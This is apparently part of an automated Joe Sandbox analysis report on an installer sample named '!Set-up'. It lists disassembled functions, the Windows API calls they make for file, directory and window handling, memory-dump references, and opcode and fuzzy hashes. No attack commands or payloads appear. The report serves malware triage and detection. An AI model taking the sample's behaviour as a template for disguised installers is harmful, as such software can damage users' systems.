                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                              Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                              Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                              Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                              • String ID:
                                                              • API String ID: 4115351271-0
                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                              Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                              Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                              Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                              Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                              Non-executed Functions

                                                              Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $ @$M$N
                                                              • API String ID: 1638840714-3479655940
                                                              • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                              • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                              Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                              Strings
                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                              • ptF, xrefs: 00406D1A
                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                              • \*.*, xrefs: 00406D2F
                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                              • API String ID: 2035342205-1650287579
                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
